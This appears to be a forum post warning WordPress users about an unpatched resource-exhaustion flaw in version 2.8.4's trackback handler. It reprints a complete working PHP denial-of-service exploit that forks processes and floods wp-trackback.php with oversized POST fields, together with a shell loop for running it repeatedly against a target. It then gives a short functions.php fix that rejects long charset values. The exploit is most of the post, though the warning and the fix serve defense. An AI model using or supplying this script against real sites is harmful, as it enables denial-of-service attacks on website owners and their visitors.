Theirs currently an exploit out for 2.8.4 which isnt patched, that will allow someone to exhause your site using a DoS against certain file(s).
Here is the POC (proof of concept)
and Here is the *temp* fix until they patch it
add this to your themes functions.php file
Here is the POC (proof of concept)
Code:
<?php /* * wordpress Resource exhaustion Exploit * http://rooibo.wordpress.com/ * [email protected] contacted and get a response, * but no solution available. * * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]> * * exploiting: * you must install php-cli (command line interface) * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done * */ if(count($argv) < 2) die("You need to specify a url to attack\n"); $url = $argv[1]; $data = parse_url($url); if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.\n"); $path = (count($data)==2)?"":$data['path']; $path = trim($path,'/').'/wp-trackback.php'; if($path{0} != '/') $path = '/'.$path; $b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b); $charset = ""; $charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset); $str .= '&url=www.example.com'; $str .= '&title='.$b; $str .= '&blog_name=lol'; $str .= '&excerpt=lol'; for($n = 0; $n <= 5; $n++){ $fp = @fsockopen($data['host'],80); if(!$fp) die("unable to connect to: ".$data['host']."\n"); $pid[$n] = pcntl_fork(); if(!$pid[$n]){ fputs($fp, "POST $path HTTP/1.1\r\n"); fputs($fp, "Host: ".$data['host']."\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ".strlen($str)."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $str."\r\n\r\n"); echo "hit!\n"; } } ?>
add this to your themes functions.php file
Code:
<?php
// WP Trackback Temp Fix
function ft_stop_trackback_dos_attacks(){
global $pagenow;
if ( 'wp-trackback.php' == $pagenow ){
// DoS attack fix.
if ( isset($_POST['charset']) ){
$charset = $_POST['charset'];
if ( strlen($charset) > 50 ) { die; }
}
}
}
add_action('init','ft_stop_trackback_dos_attacks');
?>




Comment